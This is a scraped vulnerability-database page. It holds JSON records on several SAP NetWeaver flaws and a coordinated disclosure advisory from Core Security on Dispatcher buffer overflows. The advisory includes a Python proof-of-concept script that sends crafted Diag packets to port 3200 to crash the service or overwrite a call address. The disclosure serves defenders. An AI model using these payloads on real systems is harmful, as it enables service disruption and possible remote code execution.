"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "76424"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"db": "NVD",
"id": "CVE-2015-6662"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-514"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-13T00:00:00",
"db": "BID",
"id": "76424"
},
{
"date": "2015-08-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"date": "2015-08-24T14:59:19.507000",
"db": "NVD",
"id": "CVE-2015-6662"
},
{
"date": "2015-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-514"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-12-08T22:14:00",
"db": "BID",
"id": "76424"
},
{
"date": "2015-08-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004472"
},
{
"date": "2018-12-10T19:29:11.873000",
"db": "NVD",
"id": "CVE-2015-6662"
},
{
"date": "2015-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-514"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-514"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Portal In XML External entity vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004472"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "76424"
}
],
"trust": 0.3
}
}
var-201608-0537
Vulnerability from variot
SAP NetWeaver Application Server Java is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks. SAP NetWeaver 7.4 is vulnerable.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201608-0537",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "BID",
"id": "92420"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mathieu GELI (ERPScan)",
"sources": [
{
"db": "BID",
"id": "92420"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Application Server Java is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can use specially crafted requests with directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files in the context of the application. This may aid in further attacks.\nSAP NetWeaver 7.4 is vulnerable.",
"sources": [
{
"db": "BID",
"id": "92420"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "92420",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "92420"
}
]
},
"id": "VAR-201608-0537",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:52:38.359000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.3,
"url": "https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2280371"
}
],
"sources": [
{
"db": "BID",
"id": "92420"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "92420"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-08T00:00:00",
"db": "BID",
"id": "92420"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-08T00:00:00",
"db": "BID",
"id": "92420"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "92420"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Application Server Java Directory Traversal Vulnerability",
"sources": [
{
"db": "BID",
"id": "92420"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "92420"
}
],
"trust": 0.3
}
}
var-201301-0514
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is an error in the CCMS service XML parser when validating the XML request. Allows an attacker to exploit a vulnerability to obtain local file information. SAP NetWeaver is prone to an information-disclosure vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201301-0514",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "web application server",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.0.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.10*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.30*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.02*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.01*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
}
],
"sources": [
{
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00703"
},
{
"db": "BID",
"id": "57654"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexey Tyurin of ERPScan",
"sources": [
{
"db": "BID",
"id": "57654"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is an error in the CCMS service XML parser when validating the XML request. Allows an attacker to exploit a vulnerability to obtain local file information. SAP NetWeaver is prone to an information-disclosure vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00703"
},
{
"db": "BID",
"id": "57654"
},
{
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "57654",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-00703",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201301-622",
"trust": 0.6
},
{
"db": "IVD",
"id": "9C2E460E-1F39-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00703"
},
{
"db": "BID",
"id": "57654"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
]
},
"id": "VAR-201301-0514",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00703"
}
],
"trust": 1.1867954900000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00703"
}
]
},
"last_update_date": "2022-05-17T02:02:35.665000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver CCMS Service XML Parser Information Disclosure Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31354"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00703"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/dsecrg-12-049-sap-netweaver-ccms-xml-external-entity/http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/57654"
},
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-12-049-sap-netweaver-ccms-xml-external-entity/"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00703"
},
{
"db": "BID",
"id": "57654"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00703"
},
{
"db": "BID",
"id": "57654"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-04T00:00:00",
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00703"
},
{
"date": "2013-01-31T00:00:00",
"db": "BID",
"id": "57654"
},
{
"date": "2013-01-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00703"
},
{
"date": "2013-01-31T00:00:00",
"db": "BID",
"id": "57654"
},
{
"date": "2013-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver CCMS service XML Parser Information Disclosure Vulnerability",
"sources": [
{
"db": "IVD",
"id": "9c2e460e-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00703"
},
{
"db": "BID",
"id": "57654"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
],
"trust": 1.7
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-622"
}
],
"trust": 0.6
}
}
var-201205-0130
Vulnerability from variot
The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch
TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities
SECUNIA ADVISORY ID: SA48980
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
RELEASE DATE: 2012-05-09
DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/48980/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.
The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies.
ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Advisory Information
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514
- Vulnerability Description
SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered.
- Vulnerable packages
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:
- Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
- Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).
-
Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
-
Credits
These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories .
- Technical Description / Proof of Concept Code
NOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args()
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize(sock):
diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
user_connect =
"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
support_data = "\x10\x04\x0b\x00\x20"
support_data+=
"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
support_data+=
"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader =
"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
dpheader+= struct.pack("I", len(diagheader + user_connect +
support_data))
dpheader+=
"\x00\xff\xff\xff\xff\xff\xff "
dpheader+= "terminalXXXXXXX"
dpheader+=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
send_packet(sock, dpheader + diagheader + user_connect + support_data)
def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom)
Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection)
-----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. SAP Netweaver DiagTraceR3Info Vulnerability
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability:
/----- crash = "X"114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/
8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/
8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/
8.4.
/----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/
8.5.
/----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/
8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.
/----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/
- Report Timeline
. 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: 